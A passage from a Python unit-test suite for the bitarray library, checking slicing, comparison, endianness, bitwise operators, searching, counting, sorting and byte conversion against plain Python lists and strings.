del a[::3] # ^ ^ ^
self.assertEqual(a, bitarray('0111'))
a = bitarray('10101100' '1011011')
del a[:-9:-2] # ^ ^ ^ ^
self.assertEqual(a, bitarray('10101100' '011'))
def test_delitem2(self):
for a in self.randombitarrays(start=1):
la = len(a)
for dum in range(10):
step = self.rndsliceidx(la) or None
s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
c = bitarray(a)
d = c
del c[s]
self.assertTrue(c is d)
self.check_obj(c)
cc = a.tolist()
del cc[s]
self.assertEQUAL(c, bitarray(cc, endian=c.endian()))
tests.append(SliceTests)
# ---------------------------------------------------------------------------
class MiscTests(unittest.TestCase, Util):
def test_instancecheck(self):
a = bitarray('011')
self.assertIsInstance(a, bitarray)
self.assertFalse(isinstance(a, str))
def test_booleanness(self):
self.assertEqual(bool(bitarray('')), False)
self.assertEqual(bool(bitarray('0')), True)
self.assertEqual(bool(bitarray('1')), True)
def test_to01(self):
a = bitarray()
self.assertEqual(a.to01(), '')
self.assertIsInstance(a.to01(), str)
a = bitarray('101')
self.assertEqual(a.to01(), '101')
self.assertIsInstance(a.to01(), str)
def test_iterate(self):
for lst in self.randomlists():
acc = []
for b in bitarray(lst):
acc.append(b)
self.assertEqual(acc, lst)
def test_iter1(self):
it = iter(bitarray('011'))
self.assertEqual(next(it), False)
self.assertEqual(next(it), True)
self.assertEqual(next(it), True)
self.assertStopIteration(it)
def test_iter2(self):
for a in self.randombitarrays():
aa = a.tolist()
self.assertEqual(list(a), aa)
self.assertEqual(list(iter(a)), aa)
def test_assignment(self):
a = bitarray('00110111001')
a[1:3] = a[7:9]
a[-1:] = a[:1]
b = bitarray('01010111000')
self.assertEqual(a, b)
def test_compare(self):
for a in self.randombitarrays():
aa = a.tolist()
for b in self.randombitarrays():
bb = b.tolist()
self.assertEqual(a == b, aa == bb)
self.assertEqual(a != b, aa != bb)
self.assertEqual(a <= b, aa <= bb)
self.assertEqual(a < b, aa < bb)
self.assertEqual(a >= b, aa >= bb)
self.assertEqual(a > b, aa > bb)
def test_subclassing(self):
class ExaggeratingBitarray(bitarray):
def __new__(cls, data, offset):
return bitarray.__new__(cls, data)
def __init__(self, data, offset):
self.offset = offset
def __getitem__(self, i):
return bitarray.__getitem__(self, i - self.offset)
for a in self.randombitarrays(start=1):
b = ExaggeratingBitarray(a, 1234)
for i in range(len(a)):
self.assertEqual(a[i], b[i+1234])
def test_endianness1(self):
a = bitarray(endian='little')
a.frombytes(b'\x01')
self.assertEqual(a.to01(), '10000000')
b = bitarray(endian='little')
b.frombytes(b'\x80')
self.assertEqual(b.to01(), '00000001')
c = bitarray(endian='big')
c.frombytes(b'\x80')
self.assertEqual(c.to01(), '10000000')
d = bitarray(endian='big')
d.frombytes(b'\x01')
self.assertEqual(d.to01(), '00000001')
self.assertEqual(a, c)
self.assertEqual(b, d)
def test_endianness2(self):
a = bitarray(8, endian='little')
a.setall(False)
a[0] = True
self.assertEqual(a.tobytes(), b'\x01')
a[1] = True
self.assertEqual(a.tobytes(), b'\x03')
a.frombytes(b' ')
self.assertEqual(a.tobytes(), b'\x03 ')
self.assertEqual(a.to01(), '1100000000000100')
def test_endianness3(self):
a = bitarray(8, endian='big')
a.setall(False)
a[7] = True
self.assertEqual(a.tobytes(), b'\x01')
a[6] = True
self.assertEqual(a.tobytes(), b'\x03')
a.frombytes(b' ')
self.assertEqual(a.tobytes(), b'\x03 ')
self.assertEqual(a.to01(), '0000001100100000')
def test_endianness4(self):
a = bitarray('00100000', endian='big')
self.assertEqual(a.tobytes(), b' ')
b = bitarray('00000100', endian='little')
self.assertEqual(b.tobytes(), b' ')
self.assertNotEqual(a, b)
def test_endianness5(self):
a = bitarray('11100000', endian='little')
b = bitarray(a, endian='big')
self.assertNotEqual(a, b)
self.assertEqual(a.tobytes(), b.tobytes())
def test_pickle(self):
for v in range(3):
for a in self.randombitarrays():
b = pickle.loads(pickle.dumps(a, v))
self.assertFalse(b is a)
self.assertEQUAL(a, b)
def test_overflow(self):
if _sysinfo()[0] == 8:
return
self.assertRaises(OverflowError, bitarray.__new__,
bitarray, 2**34 + 1)
a = bitarray(10 ** 6)
self.assertRaises(OverflowError, a.__imul__, 17180)
def test_unicode1(self):
a = bitarray(unicode())
self.assertEqual(a, bitarray())
a = bitarray(unicode('111001'))
self.assertEqual(a, bitarray('111001'))
for a in self.randombitarrays():
b = bitarray(unicode(a.to01()))
self.assertEqual(a, b)
def test_unicode2(self):
a = bitarray()
a.extend(unicode())
self.assertEqual(a, bitarray())
a = bitarray()
a.extend(unicode('001011'))
self.assertEqual(a, bitarray('001011'))
for a in self.randombitarrays():
b = bitarray()
b.extend(unicode(a.to01()))
self.assertEqual(a, b)
def test_unhashable(self):
a = bitarray()
self.assertRaises(TypeError, hash, a)
self.assertRaises(TypeError, dict, [(a, 'foo')])
tests.append(MiscTests)
# ---------------------------------------------------------------------------
class SpecialMethodTests(unittest.TestCase, Util):
def test_all(self):
a = bitarray()
self.assertTrue(a.all())
for s, r in ('0', False), ('1', True), ('01', False):
self.assertEqual(bitarray(s).all(), r)
for a in self.randombitarrays():
self.assertEqual(all(a), a.all())
self.assertEqual(all(a.tolist()), a.all())
def test_any(self):
a = bitarray()
self.assertFalse(a.any())
for s, r in ('0', False), ('1', True), ('01', True):
self.assertEqual(bitarray(s).any(), r)
for a in self.randombitarrays():
self.assertEqual(any(a), a.any())
self.assertEqual(any(a.tolist()), a.any())
def test_repr(self):
r = repr(bitarray())
self.assertEqual(r, "bitarray()")
self.assertIsInstance(r, str)
r = repr(bitarray('10111'))
self.assertEqual(r, "bitarray('10111')")
self.assertIsInstance(r, str)
for a in self.randombitarrays():
b = eval(repr(a))
self.assertFalse(b is a)
self.assertEqual(a, b)
self.check_obj(b)
def test_copy(self):
for a in self.randombitarrays():
b = a.copy()
self.assertFalse(b is a)
self.assertEQUAL(a, b)
b = copy.copy(a)
self.assertFalse(b is a)
self.assertEQUAL(a, b)
b = copy.deepcopy(a)
self.assertFalse(b is a)
self.assertEQUAL(a, b)
def assertReallyEqual(self, a, b):
# assertEqual first, because it will have a good message if the
# assertion fails.
self.assertEqual(a, b)
self.assertEqual(b, a)
self.assertTrue(a == b)
self.assertTrue(b == a)
self.assertFalse(a != b)
self.assertFalse(b != a)
if not is_py3k:
self.assertEqual(0, cmp(a, b))
self.assertEqual(0, cmp(b, a))
def assertReallyNotEqual(self, a, b):
# assertNotEqual first, because it will have a good message if the
# assertion fails.
self.assertNotEqual(a, b)
self.assertNotEqual(b, a)
self.assertFalse(a == b)
self.assertFalse(b == a)
self.assertTrue(a != b)
self.assertTrue(b != a)
if not is_py3k:
self.assertNotEqual(0, cmp(a, b))
self.assertNotEqual(0, cmp(b, a))
def test_equality(self):
self.assertReallyEqual(bitarray(''), bitarray(''))
self.assertReallyEqual(bitarray('0'), bitarray('0'))
self.assertReallyEqual(bitarray('1'), bitarray('1'))
def test_not_equality(self):
self.assertReallyNotEqual(bitarray(''), bitarray('1'))
self.assertReallyNotEqual(bitarray(''), bitarray('0'))
self.assertReallyNotEqual(bitarray('0'), bitarray('1'))
tests.append(SpecialMethodTests)
# ---------------------------------------------------------------------------
class NumberTests(unittest.TestCase, Util):
def test_add(self):
c = bitarray('001') + bitarray('110')
self.assertEQUAL(c, bitarray('001110'))
for a in self.randombitarrays():
aa = a.copy()
for b in self.randombitarrays():
bb = b.copy()
c = a + b
self.assertEqual(c, bitarray(a.tolist() + b.tolist()))
self.assertEqual(c.endian(), a.endian())
self.check_obj(c)
self.assertEQUAL(a, aa)
self.assertEQUAL(b, bb)
a = bitarray()
self.assertRaises(TypeError, a.__add__, 42)
def test_iadd(self):
c = bitarray('001')
c += bitarray('110')
self.assertEQUAL(c, bitarray('001110'))
for a in self.randombitarrays():
for b in self.randombitarrays():
c = bitarray(a)
d = c
d += b
self.assertEqual(d, a + b)
self.assertTrue(c is d)
self.assertEQUAL(c, d)
self.assertEqual(d.endian(), a.endian())
self.check_obj(d)
a = bitarray()
self.assertRaises(TypeError, a.__iadd__, 42)
def test_mul(self):
c = 0 * bitarray('1001111')
self.assertEQUAL(c, bitarray())
c = 3 * bitarray('001')
self.assertEQUAL(c, bitarray('001001001'))
c = bitarray('110') * 3
self.assertEQUAL(c, bitarray('110110110'))
for a in self.randombitarrays():
b = a.copy()
for n in range(-10, 20):
c = a * n
self.assertEQUAL(c, bitarray(n * a.tolist(),
endian=a.endian()))
c = n * a
self.assertEqual(c, bitarray(n * a.tolist(),
endian=a.endian()))
self.assertEQUAL(a, b)
a = bitarray()
self.assertRaises(TypeError, a.__mul__, None)
def test_imul(self):
c = bitarray('1101110011')
idc = id(c)
c *= 0
self.assertEQUAL(c, bitarray())
self.assertEqual(idc, id(c))
c = bitarray('110')
c *= 3
self.assertEQUAL(c, bitarray('110110110'))
for a in self.randombitarrays():
for n in range(-10, 10):
b = a.copy()
idb = id(b)
b *= n
self.assertEQUAL(b, bitarray(n * a.tolist(),
endian=a.endian()))
self.assertEqual(idb, id(b))
a = bitarray()
self.assertRaises(TypeError, a.__imul__, None)
tests.append(NumberTests)
# ---------------------------------------------------------------------------
class BitwiseTests(unittest.TestCase, Util):
def test_misc(self):
for a in self.randombitarrays():
b = ~a
c = a & b
self.assertEqual(c.any(), False)
self.assertEqual(a, a ^ c)
d = a ^ b
self.assertEqual(d.all(), True)
b &= d
self.assertEqual(~b, a)
def test_and(self):
a = bitarray('11001')
b = bitarray('10011')
self.assertEQUAL(a & b, bitarray('10001'))
b = bitarray('1001')
self.assertRaises(ValueError, a.__and__, b) # not same length
self.assertRaises(TypeError, a.__and__, 42)
def test_iand(self):
a = bitarray('110010110')
ida = id(a)
a &= bitarray('100110011')
self.assertEQUAL(a, bitarray('100010010'))
self.assertEqual(ida, id(a))
def test_or(self):
a = bitarray('11001')
b = bitarray('10011')
aa = a.copy()
bb = b.copy()
self.assertEQUAL(a | b, bitarray('11011'))
self.assertEQUAL(a, aa)
self.assertEQUAL(b, bb)
def test_ior(self):
a = bitarray('110010110')
b = bitarray('100110011')
bb = b.copy()
a |= b
self.assertEQUAL(a, bitarray('110110111'))
self.assertEQUAL(b, bb)
def test_xor(self):
a = bitarray('11001')
b = bitarray('10011')
self.assertEQUAL(a ^ b, bitarray('01010'))
def test_ixor(self):
a = bitarray('110010110')
a ^= bitarray('100110011')
self.assertEQUAL(a, bitarray('010100101'))
def test_invert(self):
a = bitarray()
a.invert()
self.assertEQUAL(a, bitarray())
a = bitarray('11011')
a.invert()
self.assertEQUAL(a, bitarray('00100'))
a = bitarray('11011')
b = ~a
self.assertEQUAL(b, bitarray('00100'))
self.assertEQUAL(a, bitarray('11011'))
self.assertFalse(a is b)
for a in self.randombitarrays():
b = bitarray(a)
b.invert()
for i in range(len(a)):
self.assertEqual(b[i], not a[i])
self.check_obj(b)
c = ~a
self.assertEQUAL(c, b)
self.check_obj(c)
tests.append(BitwiseTests)
# ---------------------------------------------------------------------------
class SequenceTests(unittest.TestCase, Util):
def test_contains1(self):
a = bitarray()
self.assertFalse(False in a)
self.assertFalse(True in a)
self.assertTrue(bitarray() in a)
a.append(True)
self.assertTrue(True in a)
self.assertFalse(False in a)
a = bitarray([False])
self.assertTrue(False in a)
self.assertFalse(True in a)
a.append(True)
self.assertTrue(0 in a)
self.assertTrue(1 in a)
if not is_py3k:
self.assertTrue(long(0) in a)
self.assertTrue(long(1) in a)
def test_contains2(self):
a = bitarray()
self.assertEqual(a.__contains__(1), False)
a.append(1)
self.assertEqual(a.__contains__(1), True)
a = bitarray('0011')
self.assertEqual(a.__contains__(bitarray('01')), True)
self.assertEqual(a.__contains__(bitarray('10')), False)
self.assertRaises(TypeError, a.__contains__, 'asdf')
self.assertRaises(ValueError, a.__contains__, 2)
self.assertRaises(ValueError, a.__contains__, -1)
if not is_py3k:
self.assertRaises(ValueError, a.__contains__, long(2))
def test_contains3(self):
for n in range(2, 50):
a = bitarray(n)
a.setall(0)
self.assertTrue(False in a)
self.assertFalse(True in a)
a[randint(0, n - 1)] = 1
self.assertTrue(True in a)
self.assertTrue(False in a)
a.setall(1)
self.assertTrue(True in a)
self.assertFalse(False in a)
a[randint(0, n - 1)] = 0
self.assertTrue(True in a)
self.assertTrue(False in a)
def test_contains4(self):
a = bitarray('011010000001')
for s, r in [('', True), ('1', True), ('11', True), ('111', False),
('011', True), ('0001', True), ('00011', False)]:
self.assertEqual(bitarray(s) in a, r)
tests.append(SequenceTests)
# ---------------------------------------------------------------------------
class ExtendTests(unittest.TestCase, Util):
def test_wrongArgs(self):
a = bitarray()
self.assertRaises(TypeError, a.extend)
self.assertRaises(TypeError, a.extend, None)
self.assertRaises(TypeError, a.extend, True)
self.assertRaises(TypeError, a.extend, 24)
self.assertRaises(ValueError, a.extend, '0011201')
def test_bitarray(self):
a = bitarray()
a.extend(bitarray())
self.assertEqual(a, bitarray())
a.extend(bitarray('110'))
self.assertEqual(a, bitarray('110'))
a.extend(bitarray('1110'))
self.assertEqual(a, bitarray('1101110'))
a = bitarray('00001111', endian='little')
a.extend(bitarray('00111100', endian='big'))
self.assertEqual(a, bitarray('0000111100111100'))
for a in self.randombitarrays():
for b in self.randombitarrays():
c = bitarray(a)
idc = id(c)
c.extend(b)
self.assertEqual(id(c), idc)
self.assertEqual(c, a + b)
def test_list(self):
a = bitarray()
a.extend([0, 1, 3, None, {}])
self.assertEqual(a, bitarray('01100'))
a.extend([True, False])
self.assertEqual(a, bitarray('0110010'))
for a in self.randomlists():
for b in self.randomlists():
c = bitarray(a)
idc = id(c)
c.extend(b)
self.assertEqual(id(c), idc)
self.assertEqual(c.tolist(), a + b)
self.check_obj(c)
def test_tuple(self):
a = bitarray()
a.extend((0, 1, 2, 0, 3))
self.assertEqual(a, bitarray('01101'))
for a in self.randomlists():
for b in self.randomlists():
c = bitarray(a)
idc = id(c)
c.extend(tuple(b))
self.assertEqual(id(c), idc)
self.assertEqual(c.tolist(), a + b)
self.check_obj(c)
def test_generator(self):
def bar():
for x in ('', '1', None, True, []):
yield x
a = bitarray()
a.extend(bar())
self.assertEqual(a, bitarray('01010'))
for a in self.randomlists():
for b in self.randomlists():
def foo():
for e in b:
yield e
c = bitarray(a)
idc = id(c)
c.extend(foo())
self.assertEqual(id(c), idc)
self.assertEqual(c.tolist(), a + b)
self.check_obj(c)
def test_iterator1(self):
a = bitarray()
a.extend(iter([3, 9, 0, 1, -2]))
self.assertEqual(a, bitarray('11011'))
for a in self.randomlists():
for b in self.randomlists():
c = bitarray(a)
idc = id(c)
c.extend(iter(b))
self.assertEqual(id(c), idc)
self.assertEqual(c.tolist(), a + b)
self.check_obj(c)
def test_iterator2(self):
a = bitarray()
a.extend(itertools.repeat(True, 23))
self.assertEqual(a, bitarray(23 * '1'))
def test_string01(self):
a = bitarray()
a.extend('0110111')
self.assertEqual(a, bitarray('0110111'))
for a in self.randomlists():
for b in self.randomlists():
c = bitarray(a)
idc = id(c)
c.extend(''.join(['0', '1'][x] for x in b))
self.assertEqual(id(c), idc)
self.assertEqual(c.tolist(), a + b)
self.check_obj(c)
def test_extend_self(self):
a = bitarray()
a.extend(a)
self.assertEqual(a, bitarray())
a = bitarray('1')
a.extend(a)
self.assertEqual(a, bitarray('11'))
a = bitarray('110')
a.extend(a)
self.assertEqual(a, bitarray('110110'))
for a in self.randombitarrays():
b = bitarray(a)
a.extend(a)
self.assertEqual(a, b + b)
tests.append(ExtendTests)
# ---------------------------------------------------------------------------
class MethodTests(unittest.TestCase, Util):
def test_append(self):
a = bitarray()
a.append(True)
a.append(False)
a.append(False)
self.assertEQUAL(a, bitarray('100'))
a.append(0)
a.append(1)
a.append(2)
a.append(None)
a.append('')
a.append('a')
self.assertEQUAL(a, bitarray('100011001'))
for a in self.randombitarrays():
aa = a.tolist()
b = a
b.append(1)
self.assertTrue(a is b)
self.check_obj(b)
self.assertEQUAL(b, bitarray(aa+[1], endian=a.endian()))
b.append('')
self.assertEQUAL(b, bitarray(aa+[1, 0], endian=a.endian()))
def test_insert(self):
a = bitarray()
b = a
a.insert(0, True)
self.assertTrue(a is b)
self.assertEqual(a, bitarray('1'))
self.assertRaises(TypeError, a.insert)
self.assertRaises(TypeError, a.insert, None)
for a in self.randombitarrays():
aa = a.tolist()
for _ in range(50):
item = bool(randint(0, 1))
pos = randint(-len(a) - 2, len(a) + 2)
a.insert(pos, item)
aa.insert(pos, item)
self.assertEqual(a.tolist(), aa)
self.check_obj(a)
def test_index1(self):
a = bitarray()
for i in (True, False, 1, 0):
self.assertRaises(ValueError, a.index, i)
a = bitarray(100 * [False])
self.assertRaises(ValueError, a.index, True)
self.assertRaises(TypeError, a.index)
self.assertRaises(TypeError, a.index, 1, 'a')
self.assertRaises(TypeError, a.index, 1, 0, 'a')
self.assertRaises(TypeError, a.index, 1, 0, 100, 1)
a[20] = a[27] = 1
self.assertEqual(a.index(42), 20)
self.assertEqual(a.index(1, 21), 27)
self.assertEqual(a.index(1, 27), 27)
self.assertEqual(a.index(1, -73), 27)
self.assertRaises(ValueError, a.index, 1, 5, 17)
self.assertRaises(ValueError, a.index, 1, 5, -83)
self.assertRaises(ValueError, a.index, 1, 21, 27)
self.assertRaises(ValueError, a.index, 1, 28)
self.assertEqual(a.index(0), 0)
a = bitarray(200 * [True])
self.assertRaises(ValueError, a.index, False)
a[173] = a[187] = 0
self.assertEqual(a.index(False), 173)
self.assertEqual(a.index(True), 0)
def test_index2(self):
for n in range(50):
for m in range(n):
a = bitarray(n)
a.setall(0)
self.assertRaises(ValueError, a.index, 1)
a[m] = 1
self.assertEqual(a.index(1), m)
a.setall(1)
self.assertRaises(ValueError, a.index, 0)
a[m] = 0
self.assertEqual(a.index(0), m)
def test_index3(self):
a = bitarray('00001000' '00000000' '0010000')
self.assertEqual(a.index(1), 4)
self.assertEqual(a.index(1, 1), 4)
self.assertEqual(a.index(0, 4), 5)
self.assertEqual(a.index(1, 5), 18)
self.assertRaises(ValueError, a.index, 1, 5, 18)
self.assertRaises(ValueError, a.index, 1, 19)
def test_index4(self):
a = bitarray('11110111' '11111111' '1101111')
self.assertEqual(a.index(0), 4)
self.assertEqual(a.index(0, 1), 4)
self.assertEqual(a.index(1, 4), 5)
self.assertEqual(a.index(0, 5), 18)
self.assertRaises(ValueError, a.index, 0, 5, 18)
self.assertRaises(ValueError, a.index, 0, 19)
def test_index5(self):
a = bitarray(2000)
a.setall(0)
for _ in range(3):
a[randint(0, 1999)] = 1
aa = a.tolist()
for _ in range(100):
start = randint(0, 2000)
stop = randint(0, 2000)
try:
res1 = a.index(1, start, stop)
except ValueError:
res1 = None
try:
res2 = aa.index(1, start, stop)
except ValueError:
res2 = None
self.assertEqual(res1, res2)
def test_index6(self):
for n in range(1, 50):
a = bitarray(n)
i = randint(0, 1)
a.setall(i)
for unused in range(randint(1, 4)):
a[randint(0, n-1)] = 1-i
aa = a.tolist()
for unused in range(100):
start = randint(-50, n+50)
stop = randint(-50, n+50)
try:
res1 = a.index(1-i, start, stop)
except ValueError:
res1 = None
try:
res2 = aa.index(1-i, start, stop)
except ValueError:
res2 = None
self.assertEqual(res1, res2)
def test_count1(self):
a = bitarray('10011')
self.assertEqual(a.count(), 3)
self.assertEqual(a.count(True), 3)
self.assertEqual(a.count(False), 2)
self.assertEqual(a.count(1), 3)
self.assertEqual(a.count(0), 2)
self.assertEqual(a.count(None), 2)
self.assertEqual(a.count(''), 2)
self.assertEqual(a.count('A'), 3)
self.assertRaises(TypeError, a.count, 0, 'A')
self.assertRaises(TypeError, a.count, 0, 0, 'A')
def test_count2(self):
for i in range(0, 256):
a = bitarray()
a.frombytes(bytes(bytearray([i])))
self.assertEqual(a.count(), a.to01().count('1'))
def test_count3(self):
for a in self.randombitarrays():
s = a.to01()
self.assertEqual(a.count(1), s.count('1'))
self.assertEqual(a.count(0), s.count('0'))
def test_count4(self):
N = 37
a = bitarray(N)
a.setall(1)
for i in range(N):
for j in range(i, N):
self.assertEqual(a.count(1, i, j), j - i)
def test_count5(self):
for endian in 'big', 'little':
a = bitarray('01001100' '01110011' '01', endian)
self.assertEqual(a.count(), 9)
self.assertEqual(a.count(0, 12), 3)
self.assertEqual(a.count(1, -5), 3)
self.assertEqual(a.count(1, 2, 17), 7)
self.assertEqual(a.count(1, 6, 11), 2)
self.assertEqual(a.count(0, 7, -3), 4)
self.assertEqual(a.count(1, 1, -1), 8)
self.assertEqual(a.count(1, 17, 14), 0)
def test_count6(self):
for a in self.randombitarrays():
s = a.to01()
i = randint(-3, len(a)+1)
j = randint(-3, len(a)+1)
self.assertEqual(a.count(1, i, j), s[i:j].count('1'))
self.assertEqual(a.count(0, i, j), s[i:j].count('0'))
def test_search(self):
a = bitarray('')
self.assertEqual(a.search(bitarray('0')), [])
self.assertEqual(a.search(bitarray('1')), [])
a = bitarray('1')
self.assertEqual(a.search(bitarray('0')), [])
self.assertEqual(a.search(bitarray('1')), [0])
self.assertEqual(a.search(bitarray('11')), [])
a = bitarray(100*'1')
self.assertEqual(a.search(bitarray('0')), [])
self.assertEqual(a.search(bitarray('1')), list(range(100)))
a = bitarray('10010101110011111001011')
for limit in range(10):
self.assertEqual(a.search(bitarray('011'), limit),
[6, 11, 20][:limit])
self.assertRaises(ValueError, a.search, bitarray())
self.assertRaises(TypeError, a.search, '010')
def test_itersearch(self):
a = bitarray('10011')
self.assertRaises(ValueError, a.itersearch, bitarray())
self.assertRaises(TypeError, a.itersearch, '')
it = a.itersearch(bitarray('1'))
self.assertEqual(next(it), 0)
self.assertEqual(next(it), 3)
self.assertEqual(next(it), 4)
self.assertStopIteration(it)
def test_search2(self):
a = bitarray('10011')
for s, res in [('0', [1, 2]), ('1', [0, 3, 4]),
('01', [2]), ('11', [3]),
('000', []), ('1001', [0]),
('011', [2]), ('0011', [1]),
('10011', [0]), ('100111', [])]:
b = bitarray(s)
self.assertEqual(a.search(b), res)
self.assertEqual([p for p in a.itersearch(b)], res)
def test_search3(self):
a = bitarray('10010101110011111001011')
for s, res in [('011', [6, 11, 20]),
('111', [7, 12, 13, 14]), # note the overlap
('1011', [5, 19]),
('100', [0, 9, 16])]:
b = bitarray(s)
self.assertEqual(a.search(b), res)
self.assertEqual(list(a.itersearch(b)), res)
self.assertEqual([p for p in a.itersearch(b)], res)
def test_search4(self):
for a in self.randombitarrays():
aa = a.to01()
for sub in '0', '1', '01', '01', '11', '101', '1111111':
sr = a.search(bitarray(sub), 1)
try:
p = sr[0]
except IndexError:
p = -1
self.assertEqual(p, aa.find(sub))
def test_search_type(self):
a = bitarray('10011')
it = a.itersearch(bitarray('1'))
self.assertIsInstance(type(it), type)
def test_fill(self):
a = bitarray('')
self.assertEqual(a.fill(), 0)
self.assertEqual(len(a), 0)
a = bitarray('101')
self.assertEqual(a.fill(), 5)
self.assertEQUAL(a, bitarray('10100000'))
self.assertEqual(a.fill(), 0)
self.assertEQUAL(a, bitarray('10100000'))
for a in self.randombitarrays():
aa = a.tolist()
la = len(a)
b = a
self.assertTrue(0 <= b.fill() < 8)
self.assertEqual(b.endian(), a.endian())
bb = b.tolist()
lb = len(b)
self.assertTrue(a is b)
self.check_obj(b)
if la % 8 == 0:
self.assertEqual(bb, aa)
self.assertEqual(lb, la)
else:
self.assertTrue(lb % 8 == 0)
self.assertNotEqual(bb, aa)
self.assertEqual(bb[:la], aa)
self.assertEqual(b[la:], (lb-la)*bitarray('0'))
self.assertTrue(0 < lb-la < 8)
def test_sort(self):
a = bitarray('1101000')
a.sort()
self.assertEqual(a, bitarray('0000111'))
a = bitarray('1101000')
a.sort(reverse=True)
self.assertEqual(a, bitarray('1110000'))
a.sort(reverse=False)
self.assertEqual(a, bitarray('0000111'))
a.sort(True)
self.assertEqual(a, bitarray('1110000'))
a.sort(False)
self.assertEqual(a, bitarray('0000111'))
self.assertRaises(TypeError, a.sort, 'A')
N = 100000
a = bitarray(randint(N, N + 100))
for dum in range(100):
a[randint(0, N - 1)] = randint(0, 1)
b = a.tolist()
a.sort()
self.assertEqual(a, bitarray(sorted(b)))
for a in self.randombitarrays():
b = a.tolist()
ida = id(a)
rev = randint(0, 1)
a.sort(rev)
self.assertEqual(a, bitarray(sorted(b, reverse=rev)))
self.assertEqual(id(a), ida)
def test_reverse(self):
self.assertRaises(TypeError, bitarray().reverse, 42)
for x, y in [('', ''), ('1', '1'), ('10', '01'), ('001', '100'),
('1110', '0111'), ('11100', '00111'),
('011000', '000110'), ('1101100', '0011011'),
('11110000', '00001111'),
('11111000011', '11000011111'),
('11011111' '00100000' '000111',
'111000' '00000100' '11111011')]:
a = bitarray(x)
a.reverse()
self.assertEQUAL(a, bitarray(y))
for a in self.randombitarrays():
aa = a.tolist()
b = bitarray(a)
ida = id(a)
a.reverse()
self.assertEqual(ida, id(a))
self.assertEQUAL(a, bitarray(aa[::-1], endian=a.endian()))
self.assertEqual(a, b[::-1])
def test_tolist(self):
a = bitarray()
self.assertEqual(a.tolist(), [])
a = bitarray('110')
self.assertEqual(a.tolist(), [True, True, False])
for lst in self.randomlists():
a = bitarray(lst)
self.assertEqual(a.tolist(), lst)
def test_remove(self):
a = bitarray()
for i in (True, False, 1, 0):
self.assertRaises(ValueError, a.remove, i)
a = bitarray(21)
a.setall(0)
self.assertRaises(ValueError, a.remove, 1)
a.setall(1)
self.assertRaises(ValueError, a.remove, 0)
a = bitarray('1010110')
for val, res in [(False, '110110'), (True, '10110'),
(1, '0110'), (1, '010'), (0, '10'),
(0, '1'), (1, '')]:
a.remove(val)
self.assertEQUAL(a, bitarray(res))
a = bitarray('0010011')
b = a
b.remove('1')
self.assertTrue(b is a)
self.assertEQUAL(b, bitarray('000011'))
def test_pop(self):
for x, n, r, y in [('1', 0, True, ''),
('0', -1, False, ''),
('0011100', 3, True, '001100')]:
a = bitarray(x)
self.assertEqual(a.pop(n), r)
self.assertEqual(a, bitarray(y))
a = bitarray('01')
self.assertEqual(a.pop(), True)
self.assertEqual(a.pop(), False)
self.assertRaises(IndexError, a.pop)
for a in self.randombitarrays():
self.assertRaises(IndexError, a.pop, len(a))
self.assertRaises(IndexError, a.pop, -len(a)-1)
if len(a) == 0:
continue
aa = a.tolist()
enda = a.endian()
self.assertEqual(a.pop(), aa[-1])
self.check_obj(a)
self.assertEqual(a.endian(), enda)
for a in self.randombitarrays(start=1):
n = randint(-len(a), len(a)-1)
aa = a.tolist()
self.assertEqual(a.pop(n), aa[n])
aa.pop(n)
self.assertEqual(a, bitarray(aa))
self.check_obj(a)
def test_setall(self):
a = bitarray(5)
a.setall(True)
self.assertEQUAL(a, bitarray('11111'))
for a in self.randombitarrays():
val = randint(0, 1)
b = a
b.setall(val)
self.assertEqual(b, bitarray(len(b) * [val]))
self.assertTrue(a is b)
self.check_obj(b)
def test_bytereverse(self):
for x, y in [('', ''),
('1', '0'),
('1011', '0000'),
('111011', '001101'),
('11101101', '10110111'),
('000000011', '100000000'),
('11011111' '00100000' '000111',
'11111011' '00000100' '001110')]:
a = bitarray(x)
a.bytereverse()
self.assertEqual(a, bitarray(y))
for i in range(256):
a = bitarray()
a.frombytes(bytes(bytearray([i])))
aa = a.tolist()
b = a
b.bytereverse()
self.assertEqual(b, bitarray(aa[::-1]))
self.assertTrue(a is b)
self.check_obj(b)
tests.append(MethodTests)
# ---------------------------------------------------------------------------
class StringTests(unittest.TestCase, Util):
def randombytes(self):
for n in range(1, 20):
yield os.urandom(n)
def test_frombytes(self):
a = bitarray(endian='big')
a.frombytes(b'A')
self.assertEqual(a, bitarray('01000001'))
b = a
b.frombytes(b'BC')
self.assertEQUAL(b, bitarray('01000001' '01000010' '01000011',
endian='big'))
self.assertTrue(b is a)
for b in self.randombitarrays():
c = b.copy()
b.frombytes(b'')
self.assertEQUAL(b, c)
for b in self.randombitarrays():
for s in self.randombytes():
a = bitarray(endian=b.endian())
a.frombytes(s)
c = b.copy()
b.frombytes(s)
self.assertEQUAL(b[-len(a):], a)
self.assertEQUAL(b[:-len(a)], c)
self.assertEQUAL(b, c + a)
def test_tobytes(self):
a = bitarray()
self.assertEqual(a.tobytes(), b'')
for end in ('big', 'little'):
a = bitarray(endian=end)
a.frombytes(b'foo')
self.assertEqual(a.tobytes(), b'foo')
for s in self.randombytes():
a = bitarray(endian=end)
a.frombytes(s)
self.assertEqual(a.tobytes(), s)
for n, s in [(1, b'\x01'), (2, b'\x03'), (3, b'\x07'), (4, b'\x0f'),
(5, b'\x1f'), (6, b'\x3f'), (7, b'\x7f'), (8, b'\xff'),
(12, b'\xff\x0f'), (15, b'\xff\x7f'), (16, b'\xff\xff'),
(17, b'\xff\xff\x01'), (24, b'\xff\xff\xff')]:
a = bitarray(n, endian='little')
a.setall(1)
self.assertEqual(a.tobytes(), s)
def test_unpack(self):
a = bitarray('01')
if is_py3k:
self.assertIsInstance(a.unpack(), bytes)
else:
self.assertIsInstance(a.unpack(), str)
self.assertEqual(a.unpack(), b'\x00\xff')
self.assertEqual(a.unpack(b'A'), b'A\xff')
self.assertEqual(a.unpack(b'0', b'1'), b'01')
self.assertEqual(a.unpack(one=b'\x01'), b'\x00\x01')
self.assertEqual(a.unpack(zero=b'A'), b'A\xff')
self.assertEqual(a.unpack(one=b't', zero=b'f'), b'ft')
self.assertRaises(TypeError, a.unpack, b'a', zero=b'b')
self.assertRaises(TypeError, a.unpack, foo=b'b')
for a in self.randombitarrays():
self.assertEqual(a.unpack(b'0', b'1'), a.to01().encode())
b = bitarray()
b.pack(a.unpack())
self.assertEqual(b, a)
b = bitarray()
b.pack(a.unpack(b'\x01', b'\x00'))
b.invert()
self.assertEqual(b, a)
def test_pack(self):
a = bitarray()
a.pack(b'\x00')
self.assertEqual(a, bitarray('0'))
a.pack(b'\xff')
self.assertEqual(a, bitarray('01'))
a.pack(b'\x01\x00\x7a')
